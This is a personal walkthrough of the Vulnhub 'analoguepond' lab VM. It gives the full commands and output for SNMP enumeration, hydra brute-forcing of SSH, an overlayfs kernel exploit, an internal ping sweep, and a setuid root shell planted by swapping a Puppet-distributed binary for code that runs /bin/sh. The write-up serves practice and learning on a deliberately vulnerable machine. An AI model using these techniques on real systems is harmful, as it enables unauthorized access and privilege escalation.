/ vulnhub

[Vulnhub] analoguepond - Walkthrough Part 1

You can find the VM download link here.


First I welcomed it with a straightforward nmap scan

nmap -A

I didn't find any open port in the first round. Then I tried an udp scan and did find a 161 port.

root@kali:~/vulnerhub/analoguepond# nmap -sU

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:05 EDT

Nmap scan report for
Host is up (0.00039s latency).
Not shown: 998 closed ports
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1086.52 seconds

It's a snmp service. Try to gather some information about it.

root@kali:~/vulnerhub# snmp-check
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to using SNMPv1 and community 'public'

[*] System information:

  Host IP address               :
  Hostname                      : analoguepond
  Description                   : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
  Contact                       : Eric Burdon <eric@example.com>
  Location                      : There is a house in New Orleans they call it...
  Uptime snmp                   : 15:46:07.20
  Uptime system                 : 15:45:30.22
  System date                   : 2017-8-9 17:59:18.0

I also tried other ways like nmap:

root@kali:~/vulnerhub# ls /usr/share/nmap/scripts/ | grep snmp
root@kali:~/vulnerhub# nmap -sU -Pn -p 161 --script=snmp-brute.nse

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:22 EDT
Nmap scan report for
Host is up (-0.17s latency).

161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

There we found a 'public' string for the community name, then we can try snmpwalk

root@kali:~/vulnerhub# snmpwalk -v 1 -c public
iso. = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso. = OID: iso.
iso. = Timeticks: (5719592) 15:53:15.92
iso. = STRING: "Eric Burdon <eric@example.com>"
iso. = STRING: "analoguepond"
iso. = STRING: "There is a house in New Orleans they call it..."
iso. = INTEGER: 72
iso. = Timeticks: (10) 0:00:00.10
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = STRING: "The MIB for Message Processing and Dispatching."
iso. = STRING: "The management information definitions for the SNMP User-based Security Model."
iso. = STRING: "The SNMP Management Architecture MIB."
iso. = STRING: "The MIB module for SNMPv2 entities"
iso. = STRING: "The MIB module for managing TCP implementations"
iso. = STRING: "The MIB module for managing IP and ICMP implementations"
iso. = STRING: "The MIB module for managing UDP implementations"
iso. = STRING: "View-based Access Control Model for SNMP."
iso. = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso. = STRING: "The MIB module for logging SNMP Notifications."
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (5723292) 15:53:52.92
iso. = Hex-STRING: 07 E1 08 09 12 07 04 00 2B 01 00 
iso. = INTEGER: 393216
iso. = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
iso. = Gauge32: 3
iso. = Gauge32: 43
iso. = INTEGER: 0
End of MIB

Looks llike tons of information here we got.
Noticed this line iso. = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro says the permission is ro read only, so it's more possible to find info than exploit this snmp service.
There is a username eric. iso. = STRING: "Eric Burdon <eric@example.com>"
And there is something like a hint: iso. = STRING: "There is a house in New Orleans they call it..."
Googled it, the hint should refer to this:

There is a house in New Orleans 
They call the Rising Sun

So suppose it's the password, try it:

root@kali:~/vulnerhub/analoguepond# cat pass
rising sun
the rising sun
house of the rising sun

root@kali:~/vulnerhub/analoguepond# john --wordlist:pass --rules --stdout > pass1
Press 'q' or Ctrl-C to abort, almost any other key for status
157p 0:00:00:00 100.00% (2017-08-09 16:39) 872.2p/s Houseoftherisingsuning
root@kali:~/vulnerhub/analoguepond# hydra -l eric -P pass1 ssh
Hydra v8.5 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-09 16:39:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 157 login tries (l:1/p:157), ~10 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host:   login: eric   password: therisingsun
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-09 16:39:58

I'm in.

root@kali:~/vulnerhub/analoguepond# ssh eric@
eric@'s password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0
eric@analoguepond:~$ ls

I tunneled it out to my kali, it's only a picture, nothing special after tried some tools on it.
Then I did a find trying to escalate the privilege, but nothing special either.
Then check the version and find out it's an old and broken kernel.

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

So download the overlayfs exploitation script here, compiled it on wherever and run it, we got the root.

eric@analoguepond:~$ ./ofs
root@analoguepond:~# whoami
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)

Navigated to /root, found this:

root@analoguepond:/root# ls
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Ok then, let's dig deeper. Check the net status.

root@analoguepond:/root# netstat -nplt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0*               LISTEN      1214/dnsmasq    
tcp        0      0    *               LISTEN      932/sshd        
tcp        0      0*               LISTEN      1224/qemu-system-x8
tcp        0      0*               LISTEN      1260/qemu-system-x8
tcp6       0      0 :::22                   :::*                    LISTEN      932/sshd        

So, 5900 & 5901 first attracted me because I'm poking around with my raspberry pi recently. These two ports are for vnc service. So I want to connect to it just for my curiourcity. But it turned out failed because it asked me for a passwd and I still have nothing now.

So, I noticed that it is connecting to another network. I want to scan that net but obviously I can't do nmap or netdiscover on the victim so I choosed to ping.

root@analoguepond:/tmp# cat pingall.sh 
# Program name: pingall.sh
trap 'exit 1;' INT
while IFS= read -r ip
    ping -c 1 "$ip" > /dev/null
    if [ $? -eq 0 ]; then
    #echo "node $output is up" 
    echo "$ip" 
    #echo "node $output is down"
done < "${1:-/dev/stdin}"

root@analoguepond:/tmp# seq -f "192.168.122.%g" 1 254 |./pingall.sh 
Wed Aug  9 18:46:12 BST 2017

Here I got three hosts up and the .1 is me.
Then, honestly, I had no idea what to do next for a long time and finally, I tried to ssh it........

root@analoguepond:/etc# ssh
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |

A sweet hint. :D
so, username: sandieshaw, passwd: just google it you'll find it is 'puppet on a string' then 'remove spaces' -> 'puppetonastring'

sandieshaw@'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Aug  9 16:33:33 BST 2017

  System load:  0.19              Processes:           116
  Usage of /:   68.6% of 1.58GB   Users logged in:     1
  Memory usage: 20%               IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

Nice, I'm in. (

So, here I found a private key but I didn't know what it is for or would it be useful or not, so just left it there.

sandieshaw@puppet:~/.puppet/ssl/private_keys$ cat puppet.example.com.pem 

Do a find:

sandieshaw@puppet:~$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null

There is an interesting file /tmp/spin
But when I run it, there is only a cursor which spinning forever. I tried radare to reverse it, and other little tools, no luck.

there I stuck again. After viewed other's walkthrough, I navigated to /etc, and find /etc/puppet

sandieshaw@puppet:/etc/puppet$ ls
auth.conf     etckeeper-commit-post  files	      manifests  puppet.conf
environments  etckeeper-commit-pre   fileserver.conf  modules	 templates
sandieshaw@puppet:/etc/puppet/modules$ ls
fiveeights  vulnhub  wiggle
sandieshaw@puppet:/etc/puppet/modules$ cd wiggle/
sandieshaw@puppet:/etc/puppet/modules/wiggle$ ls
files  manifests
sandieshaw@puppet:/etc/puppet/modules/wiggle$ cd files/
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c

There are many interesting files. First, the puppet is a system that helps system managers to automatically monitor and host files on devices in the system.
Second, there is a spin.c for us.

#include <stdio.h>
#include <unistd.h>

advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    pos = (pos + 1) % nbars;

main() {
    while (1) {

    return 0;

But I can't find a easy way to exploit it. But I found this file:

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";


honestly, I learned this from other's walkthrough.
But here I know that the /tmp/spin is synchronized from /wiggle/file/spin (I guess /file is a default path in puppet).
Which means, we can write another spin file and the puppet system would replace the /tmp/spin with it and grant it 4000 permission, which is good.

#include <stdio.h>
#include <unistd.h>

void main() {
    execvp("/bin/sh", NULL);

And wait for our new /tmp/spin, run it.

sandieshaw@puppet:/tmp$ ./spin 
# whoami
# id
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)

Got the root!

# pwd
# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7  2017 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
# cat flag1.txt.0xff

Finally, we got the first flag. So, this is a good point to end part 1 and I'll publish part 2 later.

Thanks for watching.


[Vulnhub] analoguepond - Walkthrough Part 1
Share this